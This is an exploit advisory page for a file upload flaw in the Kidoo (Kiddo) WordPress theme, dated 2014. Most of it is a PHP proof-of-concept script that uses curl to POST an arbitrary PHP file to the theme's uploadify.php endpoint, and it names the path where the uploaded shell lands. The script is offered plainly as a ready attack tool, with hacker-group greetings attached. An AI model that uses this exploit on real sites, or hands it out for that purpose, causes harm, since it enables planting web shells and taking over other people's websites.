Kidoo WP Theme File Upload Vulnerability

2014.02.11
Credit: TUNISIAN CYBER
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

<?php */ [+] Author: TUNISIAN CYBER [+] Exploit Title: Kidoo WP Theme File Upload Vulnerability [+] Date: 05-02-2014 [+] Category: WebApp [+] Google Dork: :( [+] Tested on: KaliLinux [+] Vendor: n/a [+] Friendly Sites: na3il.com,th3-creative.com Kiddo WP theme suffers from a File Upload Vulnerability +PoC: site/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php +Shell Path: site/3vil.php ScreenShot: http://i.imgur.com/c62cWHH.png Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX E4A Members: Gastro-DZ */ echo "=============================================== \n"; echo " Kiddo WP Theme File Upload Vulnerability\n"; echo " TUNISIAN CYBER \n"; echo "=============================================== \n\n"; $uploadfile="cyber.php"; $ch = curl_init("site-content/themes/kiddo/app/assets/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top